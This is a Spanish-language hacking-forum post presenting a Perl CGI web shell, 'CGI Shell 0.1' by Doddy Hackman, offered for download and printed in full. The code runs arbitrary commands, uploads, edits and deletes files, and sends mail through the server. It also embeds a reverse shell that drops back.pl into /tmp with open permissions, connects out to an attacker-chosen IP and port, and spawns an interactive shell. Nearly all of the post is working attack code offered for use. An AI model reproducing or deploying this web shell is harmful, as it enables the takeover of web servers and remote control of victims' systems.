13 Years of Service
57%
Hola a todosHoy eh terminado de hacer un shell en cgi , estas shells se usan en las paginas que pemiten ejecutar archivos cgi y tienen el directorio cgi-binEsta shell tiene las sig opciones* Listar directorios* Ver y editar archivos* Eliminar archivos y directorios* ReverseShell* Subir archivos a un directorio especificado* Ejecutar comandos* Enviar mails
Si lo quieren descargar desde sourceforge[HIDE-THANKS]
[/HIDE-THANKS]
Code:
>#!"\xampp\perl\bin\perl.exe"##CGI Shell 0.1##(C) Doddy Hackman 2011##use CGI;use Cwd;use HTML::Entities;use Net::SMTP;my %rta;my $que = new CGI;my @ques = $que->param;for(@ques) {$rta{$_} = $que->param($_);}print "Content-type:text/html\n\n";print "CGI Shell (C) Doddy Hackman 2011CGI Shell";if ($rta{'filex'}) {open FILE ,">>".$rta{'todir'}."/".$rta{'filex'}; while($bytes = read($rta{'filex'},$todo, 1024)) {print FILE $todo;}close FILE;print "";}if ($rta{'codefile'}) {unlink($rta{'filecode'});open (FILE,">>".$rta{'filecode'});print FILE $rta{'codefile'}."\n";close FILE;print "";}if ($rta{'loadfile'}) {print "";print "
File ".$rta{'loadfile'}."
";if (-f $rta{'loadfile'}) {print "";open (FILE,$rta{'loadfile'});@words = ;close FILE;for (@words) {print HTML::Entities::encode($_);}print "
";exit(1);}}print "
Console
";if ($rta{'cmd'}) {print qx($rta{'cmd'});}elsif ($rta{'mail'}) {my $send = Net::SMTP->new("localhost",Hello => "localhost",Timeout=>10) or die("[-] Error");$send->mail($rta{'mail'});$send->to($rta{'to'}); $send->data(); $send->datasend("To:".$rta{'to'}."\n"."From:".$rta{'mail'}."\n"."Subject:".$rta{'subject'}."\n".$rta{'body'}."\n\n"); $send->dataend(); $send->quit();}elsif ($rta{'loadir'}) {if (-d $rta{'loadir'}) {opendir DIR,$rta{'loadir'};my @archivos = readdir DIR;close DIR;for(@archivos) {if (-d $_) {print "".$_."
"; } else {print $_."
";}}}}elsif (-f $rta{'delfile'}) {if (unlink($rta{'delfile'})) {print "";} else {print "";}}elsif (-d $rta{'deldir'}) {if (rmdir($rta{'deldir'})) {print "";} else {print "";}}elsif ($rta{'ipconnect'}) {$code = '#!usr/bin/perl#Reverse Shell 0.1#By Doddy Huse IO::Socket;print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";unless (@ARGV == 2) { print "[sintax] : $0 \n\n";exit(1);} else {print "[+] Starting the connection\n";print "[+] Enter in the system\n";print "[+] Enjoy !!!\n\n";conectar($ARGV[0],$ARGV[1]);tipo();}sub conectar {socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));open (STDIN,">&REVERSE");open (STDOUT,">&REVERSE");open (STDERR,">&REVERSE");}sub tipo {print "\n[*]Reverse Shell Starting...\n\n";if ($^O =~/Win32/ig) {infowin();system("cmd.exe");} else {infolinux();#root(); system("export TERM=xterm;exec sh -i");}}sub infowin {print "[+] Domain Name : ".Win32::DomainName()."\n";print "[+] OS Version : ".Win32::GetOSName()."\n";print "[+] Username : ".Win32::LoginName()."\n\n\n";}sub infolinux {print "[+] System information\n\n";system("uname -a");print "\n\n";}#The End';if ($^O =~/Win32/ig) { open (FILE,">>"."back.pl");chmod("back.pl","777");} else {open (FILE,">>"."/tmp/back.pl");chmod("/tmp/back.pl","777");}print FILE $code;close FILE;if ($^O == "MSWin32") { system("back.pl ".$rta{'ipconnect'}." ".$rta{'port'});} else {system("cd /tmp;back.pl ".$rta{'ipconnect'}." ".$rta{'port'});}} else {opendir DIR,getcwd();my @archivos = readdir DIR;close DIR;for(@archivos) {if (-d $_) {print "".$_."
"; } else {print $_."
";}}}print "
Command :
Load directory : Load File : Delete File : Delete Directory :
Upload File :
To dir :
Mailer
Mail :
To :
Subject :
Body :
ReverseShell
IP :
Port :
";# ¿ The End ?
This link is hidden for visitors. Please Log in or register now.